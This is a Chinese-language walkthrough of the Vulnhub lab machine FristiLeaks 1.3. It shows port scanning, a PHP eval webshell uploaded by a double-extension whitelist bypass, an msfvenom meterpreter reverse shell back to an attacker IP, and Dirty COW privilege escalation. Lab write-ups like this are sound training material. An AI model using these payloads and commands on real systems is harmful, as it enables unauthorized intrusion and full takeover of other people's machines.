Vulnhub靶机 FristiLeaks 1.3 write up

Posted 2021-12-28 whoami。

FristiLeaks 1.3write up

• 0x00 靶场搭建
• 0x01 信息收集
• • ip探测
  • 端口服务识别
• 0x02 漏洞挖掘
• • web渗透思路
  • 步骤一：浏览网页，爆破目录
  • 步骤二：测试登录框
  • 步骤三：ctrl+u 查看源码
  • 步骤三：kali base64解码
  • 步骤四：登录后台
  • 步骤五：尝试上传php马
  • 步骤六：蚁剑 连接webshell
  • 步骤七：上个msf马吧（直接反弹shell 也可以）
• 0x03 提权
• • 步骤八：提权
• 0x04 总结

0x00 靶场搭建

• 靶机下载

    https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova
  

• 靶机配置
  VM搭建

网络设为nat
按作者要求将网卡mac地址 设为

	08:00:27:A5:A6:76

开机就会显现出IP

• 攻击机
  kali
  win10

0x01 信息收集

ip探测

netdiscover -i eth0 -r 192.168.157.0/24

端口服务识别

masscan --rate=1000 -p 1-65535 192.168.157.163

nmap -sC -sV -A -p 80 192.168.157.163 -o port.txt

开放的端口
只开放了 80
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 php/5.3.3)

0x02 漏洞挖掘

web渗透思路

（1）页面枚举，查看各个页面功能点。
（2）手注+工具AWVS、APPscan、xray测试。
有cms的话 直接搜索cms对应版本漏洞利用。

步骤一：浏览网页，爆破目录

（1）看主页功能点，源码，robots.txt 没有什么头绪
（2）用kali dirsearch win10 御剑 爆破目录。
爆破出 /images/ robots.txt 没有发现利用点
（3） 既然只开放了80端口 ，就肯定从web方面拿shell，说明 字典不够强大。尝试利用靶机名字 或者网页中的字符 作为 字典 枚举目录。
出现 /fristi

欢迎来到管理员门户网站

步骤二：测试登录框

先手动 尝试 万能密码 报错 没有成功
上sqlmap
也显示不存在注入 先放弃登录框

步骤三：ctrl+u 查看源码

我们需要清理干净这些为了上线后。
为了测试更容易，我在这里留下一些东西。

下边有base64 编码

步骤三：kali base64解码

（1）用burp 解密后发现是png开头的图片，但是不能拷贝到txt中 转换为 png打开。

（2）用kali 自带的base64 命令 解码 保存到 png文件中

先将 base64 编码后的 字符 存储到 txt文件中

然后

base64 -d base64.txt > base64_d.png

再打开文件管理器 图片位置 双击打开

应该是 密码 keKkeKKeKKeKkEkkEk

而用户名 猜想 应该是 留下这串“后门”的人

步骤四：登录后台

用户名 为 eezeepz
密码 keKkeKKeKKeKkEkkEk

登录成功

直接就 显示出一个上传文件的功能 好直接。

步骤五：尝试上传php马

（1）尝试上传1.php文件

<?php eval($_REQUEST[1]); ?> 

果然 有限制 白名单验证 只允许上传 png,jpg,gif格式

（2） 想办法绕过

整合信息收集结果

Apache httpd 2.2.15
CentOS
PHP/5.3.3

先尝试 apache 的多后缀解析 （虽然忘记影响的具体版本啦）
（3）上传抓包 将文件名修改为 webshell.php.jpg

?? 直接就上传成功啦 没有显示文件名，只显示了 位置
（4）尝试以原文件名访问 上传后的文件

http://192.168.157.163/fristi/uploads/webshell.php.jpg

访问成功。

步骤六：蚁剑 连接webshell

连接成功。

步骤七：上个msf马吧（直接反弹shell 也可以）

可以ping 通外网

ping 192.168.157.137 > 1.txt

（1）msf生成exe反向连接的木马

  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.157.137 LPORT=4444 -f elf > shell.elf

（2）启动监听

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp 
set LHOST 192.168.157.137
set LPORT 4444
run

（3）用蚁剑上传木马到 靶机，并执行

（4）反弹shell成功

0x03 提权

步骤八：提权

（1） 用linux-exploit-suggester.sh工具 寻找内核漏洞

uname -a  收集内核信息

（2）查看提权建议

./linux-exploit-suggester.sh -u "Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux"

（3）脏牛漏洞尝试

（4） 搜索dirty cow

searchsploit   dirty cow

这里使用40839

（5）下载脚本

searchsploit -m 40839

（6）msf上传到靶机/tmp目录

upload 40839.c /tmp

（6）编译运行

gcc -pthread 40839.c -o exp -lcrypt

执行 ./exp （密码 随意起）
./exp yuan

成功

（7） su firefart

报错 必须在终端运行

（8）python 启动终端 提权成功

python -c 'import pty;pty.spawn("/bin/bash")'
su firefart
yuan

0x04 总结

该靶机难度一般，
寻找后台废了点时间，通过结合 靶机名字 网页 关键信息 猜出来。
又通过开发为了方便在源码中留下的登录信息，获取密码，通过留下的用户名获取用户名登录后台。
文件上传 通过apache 多后缀解析绕过白名单。
提权 脏牛漏洞。